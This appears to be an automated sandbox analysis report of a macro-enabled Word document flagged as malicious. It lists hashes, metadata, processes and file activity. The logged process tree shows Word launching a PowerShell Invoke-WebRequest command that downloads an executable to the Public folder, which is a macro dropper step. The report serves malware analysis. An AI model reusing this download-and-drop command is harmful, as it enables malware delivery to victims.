File name: | 4404d13d86f8164f1df2f42c1565064d80c12136e4a38d7c84916d66a38b7227.docm |
Full analysis: | https://app.any.run/tasks/b2be85d9-3a09-4646-bd23-611d1d9c409b |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 01:44:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | FAD605D85046CAF60E9C71D177F3481C |
SHA1: | 1F04242123FB4834168D4E8D3040A2BB9F78FD66 |
SHA256: | 4404D13D86F8164F1DF2F42C1565064D80C12136E4A38D7C84916D66A38B7227 |
SSDEEP: | 768:kUs79W/0+gXc8UWBnLF3xllN/aOHzosXmV+skVuy7sjQmBPsthfQOD:klW/ngs8UWdBBtaOTo+Gir |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0x2acda017 |
ZipCompressedSize: | 449 |
ZipUncompressedSize: | 2053 |
ZipFileName: | [Content_Types].xml |
Template: | Normal |
---|---|
TotalEditTime: | 1.1 hours |
Pages: | 6 |
Words: | 1053 |
Characters: | 5689 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 47 |
Paragraphs: | 13 |
ScaleCrop: | No |
HeadingPairs: |
|
TitlesOfParts: | - |
Company: | - |
LinksUpToDate: | No |
CharactersWithSpaces: | 6729 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 16 |
Keywords: | - |
LastModifiedBy: | Bruno Alves |
RevisionNumber: | 16 |
CreateDate: | 2019:03:20 04:38:00Z |
ModifyDate: | 2019:03:20 06:16:00Z |
Title: | - |
---|---|
Subject: | - |
Creator: | 那是什么 |
Description: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1848 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4404d13d86f8164f1df2f42c1565064d80c12136e4a38d7c84916d66a38b7227.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3284 | powershell.exe ""Invoke-WebRequest 'http://localhost/shell/TESTE01.exe' -outfile 'C:\Users\Public\sucesso.exe'"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR88CE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\mso8B40.tmp | — | |
MD5:— | SHA256:— | |||
3284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LT6N51S0IXVUMXWYO2CM.temp | — | |
MD5:— | SHA256:— | |||
3284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9198.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
1848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:1639C7AA43D044C737E63CA0D7A9434F | SHA256:26D98EB09C4E87C6CF0D9E2AAC738CEF65FC80DD249F6C335FFE9CC9197DB3E2 | |||
1848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$04d13d86f8164f1df2f42c1565064d80c12136e4a38d7c84916d66a38b7227.docm | pgc | |
MD5:FF4AC4C631E503849C2B7A74B4115020 | SHA256:1C816821DC685B9B4097E7E1A1AA0C0D6F6C09EAA148D62B610AF835CCBE3F90 | |||
1848 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:598AE5467BBA16A5D71B1F59ACFC28E2 | SHA256:C5AD99449443DF20D6FFA5205364E42F4788BBDD5E7153ACF63EB3AA95813F95 | |||
3284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
Process | Message |
---|---|
WINWORD.EXE | Escape: |
WINWORD.EXE | ÿÿÿÿ |
WINWORD.EXE | |
WINWORD.EXE | Escape: |
WINWORD.EXE | ÿÿÿÿ |
WINWORD.EXE | |
WINWORD.EXE | Escape: |
WINWORD.EXE | ÿÿÿÿ |
WINWORD.EXE |